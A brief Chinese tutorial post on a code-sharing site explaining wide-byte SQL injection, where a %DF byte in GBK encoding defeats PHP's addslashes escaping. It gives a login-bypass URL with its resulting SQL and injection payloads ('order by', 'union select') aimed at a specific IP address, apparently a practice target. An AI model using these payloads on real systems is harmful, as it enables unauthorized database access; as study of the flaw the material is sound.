宽字节注入

首页 > 代码库 > 宽字节注入

2024-08-20 23:14:50 211人阅读

宽字节注入原理：

　　%DF’ ：会被PHP当中的addslashes函数转义为“%DF\‘” ，“\”既URL里的“%5C”，那么也就是说，“%DF‘”会被转成“%DF%5C%27”倘若网站的字符集是GBK，MYSQL使用的编码也是GBK的话，就会认为“%DF%5C%27”是一个宽字符。也就是“縗’”

例如：http://www.xxx.com/login.php?user=%df’ or 1=1 limit 1,1%23&pass=

其对应的sql就是：

select * fromcms_user where username = ‘運’ or 1=1 limit 1,1#’ and password=”

http://103.238.227.13:10083/index.php?id=1%df‘ order by 2%23
======>推出有两个字段数

技术分享

然后再将sql修改

http://103.238.227.13:10083/index.phpid=-10%df‘ union select 1,databases()%23

.....

宽字节注入

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们

首页 > 代码库 > 宽字节注入

宽字节注入

看完仍有疑问？有类似问题直接问程序猿